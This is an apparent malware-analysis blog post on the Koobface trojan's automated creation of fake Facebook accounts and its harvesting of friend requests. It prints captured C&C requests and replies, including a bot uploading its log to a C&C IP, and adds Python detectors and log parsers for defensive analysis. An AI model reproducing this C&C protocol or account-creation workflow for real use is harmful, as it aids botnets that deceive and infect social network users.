
Dangerous friend requests on Facebook

While analyzing the Koobface trojan, I just made an interesting find. As mentioned in my post “Koobface – the social network trojan” from last year, Koobface uses social networks to spread itself. So let me ask you: What does a trojan need to spread itself on social networking sites? The answer is simple: a valid account. The cybercriminal has two possibilities to obtain valid accounts:

  • Using some phishing tricks to steal credentials
  • Creating fake accounts

There are two reasons why most cybercriminals try to phish the credentials of users of social networking sites instead of creating fake accounts on their own:

  • Most of the time, the registration forms of the social networking sites are protected with a captcha
  • At the moment, there is no reliable method to break captchas

As described in my post about Koobface last year, the Koobface trojan is able to “break” captchas (to be precise, the trojan doesn’t break the captchas itself; rather, it serves the captchas to the infected bots, where they are solved by the users). By using this technique, it is able to create hundreds of fake accounts on social networks (per minute!).

Creating malicious Facebook accounts
To spread itself, the trojan creates spoofed Facebook accounts with which it posts malicious comments and sends messages with a link to a malicious site. For those of you who are not familiar with Facebook: Before you can write a message to somebody or post on their pinboard, you have to be a friend of this person. So before the Koobface trojan can start to post malicious messages, it has to get some friends. Don’t be afraid, but even that is no problem for Koobface: It is able to send friend requests to hundreds of Facebook members.

When you log into Facebook, your browser will save a cookie on your computer. Koobface in fact uses the Internet Explorer installed on an infected computer to log into Facebook, so it ends up using the same cookies as you. So what would happen when you are infected with Koobface and try to access *your* personal Facebook account?

Uuuh?!?! What’s that?

That’s not my account ?!?! But who is Anyeta Fecher?
The answer is simple: That’s an account which was created by Koobface. But how does that work? I will show you:

First of all, the trojan sends a request to a zombie, calling the grgen module:

POST /.sys/?action=grgen&v=05 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

The zombie/proxy will return some information about the account which the infected bot should create:

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close

#BLACKLABEL
SOFT|ADD
LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
PASS|ci6h}r95df0
ID|21375
BIRTHDAY-YEAR|1982
BIRTHDAY-MONTH|7
BIRTHDAY-DAY|16
LOGS|1
[...]

Let’s take a deeper look at this response: It instructs the bot to create a new account (SOFT|ADD) using an email address (LOGIN) and a password (PASS). The email address in the LOGIN parameter as well as the password are scrambled (so you won’t be able to log in with these credentials). The zombie returns some more parameters such as the birthday, the Facebook groups the malicious account should join, etc. The bot now starts with the registration of the account. During the registration process, it gets a captcha from Facebook which it sends to the C&C server. As soon as the captcha is solved, the C&C server returns it to the bot, which can now finish the registration process.
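To make the exchange above usable on the analysis side, here is an added example (not code from the original post, and not Koobface’s own) that does two things an analyst or IDS author would want: it matches the grgen request against the two indicators visible in the capture (the `/.sys/?action=grgen` request line and the odd `na; )` User-Agent), and it parses a `#BLACKLABEL` reply into its KEY|VALUE fields. The sample request and reply are constructed from the capture shown above (the elided `[...]` tail is left out); the meaning attached to `LOGS|1` is an assumption.

```python
import re
from datetime import date

# Constructed sample: the grgen request and the #BLACKLABEL reply as captured
# in the post (the "[...]" tail of the reply is left out).
SAMPLE_REQUEST = (
    "POST /.sys/?action=grgen&v=05 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

SAMPLE_RESPONSE_BODY = """\
#BLACKLABEL
SOFT|ADD
LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
PASS|ci6h}r95df0
ID|21375
BIRTHDAY-YEAR|1982
BIRTHDAY-MONTH|7
BIRTHDAY-DAY|16
LOGS|1
"""

# Request-line pattern for the grgen module call; the "v=" parameter is left open
# because it looks like a build/version number that may change.
GRGEN_REQUEST_LINE = re.compile(r"^POST /\.sys/\?action=grgen(?:&|\s)")
# The malformed UA string from the capture: "na; )" sits where a platform token belongs.
KOOBFACE_USER_AGENT = "Mozilla/4.0 (compatible; MSIE 7.0; na; )"


def request_indicators(raw_request):
    """Return the names of the Koobface C&C indicators present in a raw HTTP request."""
    lines = raw_request.split("\r\n")
    hits = []
    if GRGEN_REQUEST_LINE.search(lines[0]):
        hits.append("grgen_module_request")
    headers = {}
    for line in lines[1:]:
        if not line:                      # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    if headers.get("user-agent") == KOOBFACE_USER_AGENT:
        hits.append("koobface_user_agent")
    return hits


def parse_blacklabel(body):
    """Parse a '#BLACKLABEL' reply into a dict KEY -> VALUE (split at the first '|')."""
    lines = [ln.strip() for ln in body.splitlines() if ln.strip()]
    if not lines or lines[0] != "#BLACKLABEL":
        raise ValueError("not a #BLACKLABEL response")
    fields = {}
    for ln in lines[1:]:
        key, sep, value = ln.partition("|")
        if not sep:
            raise ValueError("malformed field line: %r" % ln)
        fields[key] = value               # LOGIN/PASS stay as the scrambled text they are
    return fields


def account_job(fields):
    """Summarise the account-creation job an infected bot was handed."""
    birthday = date(int(fields["BIRTHDAY-YEAR"]),
                    int(fields["BIRTHDAY-MONTH"]),
                    int(fields["BIRTHDAY-DAY"]))
    return {
        "command": fields.get("SOFT"),          # "ADD" = create a new account
        "job_id": fields.get("ID"),
        "birthday": birthday.isoformat(),
        # Assumption: LOGS|1 switches the bot's log upload on (not confirmed by the capture).
        "logging": fields.get("LOGS") == "1",
    }


if __name__ == "__main__":
    print("indicators:", request_indicators(SAMPLE_REQUEST))
    print("job:", account_job(parse_blacklabel(SAMPLE_RESPONSE_BODY)))
```

The header loop lowercases header names on purpose: the later log upload in this post uses `COnnecTIon: cLOse`, so any matching on these requests has to be case-insensitive.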

In the next step, the trojan sends a log back to the C&C server with some information about the registration of the Facebook account:

POST /log.php?id=21963&soft=ADD&build=0017 HTTP/1.1
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: 61.235.117.83
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Content-Length: 3759

20100109 16:38:53 ThreadID:1504 ProcID: 1516 reg build 0018
20100109 16:38:53 ThreadID:1504 ProcID: 1516 FB reg start
20100109 16:38:53 ThreadID:1504 ProcID: 1516 IE VERSION=7.0.5730.10
20100109 16:38:53 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:38:53 ThreadID:1504 ProcID: 1516 get work domain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 create browser thread
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create google browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 Create main browser
20100109 16:38:53 ThreadID:1504 ProcID: 1516 getactivedomain
20100109 16:38:53 ThreadID:1504 ProcID: 1516 check inet
20100109 16:38:53 ThreadID:1504 ProcID: 1516 inet ok
20100109 16:38:53 ThreadID:1504 ProcID: 1516 trying
20100109 16:38:53 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 valid domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 work domain
20100109 16:38:54 ThreadID:1504 ProcID: 1516 xxxxxxx.xx
20100109 16:38:54 ThreadID:1504 ProcID: 1516 wait inet begin
20100109 16:38:54 ThreadID:1504 ProcID: 1516 Request params
20100109 16:38:54 ThreadID:1504 ProcID: 1516 #BLACKLABEL
20100109 16:38:54 ThreadID:1504 ProcID: 1516 SOFT|ADD
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGIN|kulchvr.hhwgzlbsy/oon@hodma/erq
20100109 16:38:54 ThreadID:1504 ProcID: 1516 PASS|ci6h}r95df0
20100109 16:38:54 ThreadID:1504 ProcID: 1516 ID|21375
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-YEAR|1982
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-MONTH|7
20100109 16:38:54 ThreadID:1504 ProcID: 1516 BIRTHDAY-DAY|16
20100109 16:38:54 ThreadID:1504 ProcID: 1516 LOGS|1
20100109 16:38:54 ThreadID:1504 ProcID: 1516 switch to confirm mode
20100109 16:38:54 ThreadID:1504 ProcID: 1516 confirmer module start
20100109 16:38:54 ThreadID:1504 ProcID: 1516 checking login
20100109 16:38:54 ThreadID:1504 ProcID: 1516 C:\Documents and settings\USER\Cookies
20100109 16:39:08 ThreadID:1504 ProcID: 1516 fb logoff begin
20100109 16:39:13 ThreadID:1504 ProcID: 1516 logout link not found
20100109 16:39:13 ThreadID:1504 ProcID: 1516 trying to login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 fill login
20100109 16:39:17 ThreadID:1504 ProcID: 1516 check persist
20100109 16:39:20 ThreadID:1504 ProcID: 1516 fill pass
20100109 16:39:22 ThreadID:1504 ProcID: 1516 try submit
20100109 16:39:22 ThreadID:1504 ProcID: 1516 click submit button
20100109 16:39:30 ThreadID:1504 ProcID: 1516 seem to be logged in
20100109 16:39:35 ThreadID:1504 ProcID: 1516 confirm acc start
20100109 16:39:40 ThreadID:1504 ProcID: 1516 ERROR: skip step link not found
20100109 16:39:40 ThreadID:1504 ProcID: 1516 login ok
20100109 16:39:45 ThreadID:1504 ProcID: 1516 groups confirm begin
20100109 16:39:53 ThreadID:1504 ProcID: 1516 groups confirm end
20100109 16:39:53 ThreadID:1504 ProcID: 1516 friend request confirm begin
20100109 16:39:58 ThreadID:1504 ProcID: 1516 friend request confirm end
20100109 16:39:58 ThreadID:1504 ProcID: 1516 scan friend begin
20100109 16:40:04 ThreadID:1504 ProcID: 1516 no friends found
20100109 16:40:04 ThreadID:1504 ProcID: 1516 scan friend end
20100109 16:40:04 ThreadID:1504 ProcID: 1516 Stats: added 0
20100109 16:40:04 ThreadID:1504 ProcID: 1516 PLACES DUMP
20100109 16:40:04 ThreadID:1504 ProcID: 1516
20100109 16:40:04 ThreadID:1504 ProcID: 1516 finished
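
Logs like the one above are uploaded by every infected bot, so an analyst who gets hold of them (from a sinkhole or a lab capture) wants to turn them into a timeline rather than read them line by line. The following is an added example, not code from the original post: it parses the `YYYYMMDD HH:MM:SS ThreadID:n ProcID: n message` lines, pairs the `... begin` / `... end` markers into phase durations, collects `ERROR:` lines and reads the `Stats: added N` counter. The sample log is a constructed subset of the lines shown above.

```python
import re
from datetime import datetime

# Constructed excerpt of the bot's status log (a subset of the lines in the capture above).
SAMPLE_LOG = """\
20100109 16:38:53 ThreadID:1504 ProcID: 1516 reg build 0018
20100109 16:38:53 ThreadID:1504 ProcID: 1516 FB reg start
20100109 16:38:53 ThreadID:1504 ProcID: 1516 C:\\Documents and settings\\USER\\Cookies
20100109 16:38:54 ThreadID:1504 ProcID: 1516 switch to confirm mode
20100109 16:39:13 ThreadID:1504 ProcID: 1516 trying to login
20100109 16:39:30 ThreadID:1504 ProcID: 1516 seem to be logged in
20100109 16:39:40 ThreadID:1504 ProcID: 1516 ERROR: skip step link not found
20100109 16:39:40 ThreadID:1504 ProcID: 1516 login ok
20100109 16:39:45 ThreadID:1504 ProcID: 1516 groups confirm begin
20100109 16:39:53 ThreadID:1504 ProcID: 1516 groups confirm end
20100109 16:39:53 ThreadID:1504 ProcID: 1516 friend request confirm begin
20100109 16:39:58 ThreadID:1504 ProcID: 1516 friend request confirm end
20100109 16:39:58 ThreadID:1504 ProcID: 1516 scan friend begin
20100109 16:40:04 ThreadID:1504 ProcID: 1516 no friends found
20100109 16:40:04 ThreadID:1504 ProcID: 1516 scan friend end
20100109 16:40:04 ThreadID:1504 ProcID: 1516 Stats: added 0
20100109 16:40:04 ThreadID:1504 ProcID: 1516
20100109 16:40:04 ThreadID:1504 ProcID: 1516 finished
"""

# One log line; the message part is optional because the bot emits empty lines too.
LINE_RE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"ThreadID:(?P<tid>\d+) ProcID: (?P<pid>\d+)(?: (?P<msg>.*))?$"
)
STATS_RE = re.compile(r"^Stats: added (\d+)$")


def parse_log(text):
    """Turn the raw log into a list of events with real timestamps; unknown lines are skipped."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if not m:
            continue
        ts = datetime.strptime(m["date"] + m["time"], "%Y%m%d%H:%M:%S")
        events.append({"ts": ts, "tid": int(m["tid"]), "pid": int(m["pid"]),
                       "msg": m["msg"] or ""})
    return events


def summarize_registration(events):
    """Summarise one registration run: total time, phase durations, errors, friends added."""
    if not events:
        return None
    phases, begun = {}, {}
    errors, friends_added, login_ok = [], None, False
    for ev in events:
        msg = ev["msg"]
        if msg.endswith(" begin"):
            begun[msg[:-len(" begin")]] = ev["ts"]          # open a phase
        elif msg.endswith(" end"):
            name = msg[:-len(" end")]
            if name in begun:                               # close it if we saw the begin
                phases[name] = (ev["ts"] - begun.pop(name)).total_seconds()
        elif msg.startswith("ERROR:"):
            errors.append(msg)
        elif msg == "login ok":
            login_ok = True
        else:
            m = STATS_RE.match(msg)
            if m:
                friends_added = int(m.group(1))
    return {
        "lines": len(events),
        "duration_s": (events[-1]["ts"] - events[0]["ts"]).total_seconds(),
        "login_ok": login_ok,
        "errors": errors,
        "phases": phases,
        "friends_added": friends_added,
    }


if __name__ == "__main__":
    print(summarize_registration(parse_log(SAMPLE_LOG)))
```

Phases that begin but never end (such as `wait inet begin` in the full log) simply stay open and do not appear in the result, so a missing `end` marker never throws the summary off.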

As you can see, the log is quite detailed (yeah, “click submit button” and “scan friend end” sound funny…).
Now the trojan will start to “get some” friends. I suppose that the trojan parses the member list of the group which it received from the C&C server when it requested the grgen module:

Let’s wait some minutes….. and then we will take another look at the malicious profile:

As you can see, the Koobface bot just sent out more than 1’000 friend requests on Facebook within a few minutes! But what surprised me much more is the fact that all those people accepted the friend request. So I ask myself: why do so many people accept friend requests from people they don’t even know?

Conclusion
Within a few minutes, more than 1’000 new friends were harvested by Koobface – all of them are potential victims now; as soon as the bot starts to send out posts/messages, it becomes a real threat to its friends.

So, what have we learned?

  • Please be careful with friend requests from persons you don’t know (this also applies to all other social networks like MySpace, Netlog, hi5, etc.)
  • If you find a malicious profile, report it to the administrator of the social network (e.g. by using the report button)
  • And last but not least: If you go to Facebook and you are logged in with an unknown profile, you are infected with Koobface….

Happy (and safe) social networking!
